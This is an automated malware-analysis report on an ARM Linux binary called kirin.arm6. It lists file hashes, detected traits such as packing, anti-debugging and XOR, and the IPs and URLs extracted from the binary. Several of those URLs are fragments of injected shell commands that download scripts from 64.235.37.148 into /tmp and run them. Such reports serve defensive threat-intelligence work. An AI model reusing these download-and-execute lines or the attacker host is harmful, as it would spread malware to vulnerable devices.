kirin.arm6
First submission 2024-10-18 00:30:02
File details
File type: | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped |
Mime type: | application/x-executable |
File size: | 114.02 KB (116760 bytes) |
MD5: | 81b105bb0598d1c7a463ca84d4498da7 |
SHA1: | 4ab6653353213283dfa5aa96aa6a1b8aa78ed3b4 |
SHA256: | ea2016712e38f33dfb5c0984b165a6d69cc86f99ecb7c6774d7f46d099f3c9c4 |
File features detected
Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR
URLs, FQDN and IP indicators 1
Strings analysis - Possible IPs found 7
1.9.2.6 |
1.9.2.4 |
1.8.1.11 |
1.9.0.8 |
64.235.37.148 |
8.8.8.8 |
1.9.0.6 |
Strings analysis - Possible URLs found 6
http://64.235.37.148/gpon+-O+/tmp/gaf;sh+/tmp/gaf |
http://64.235.37.148/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$ |
http://64.235.37.148/real.sh |
http://schemas.xmlsoap.org/soap/envelope/ |
http://schemas.xmlsoap.org/soap/encoding/ |
http://64.235.37.148/Kirin.sh;chmod |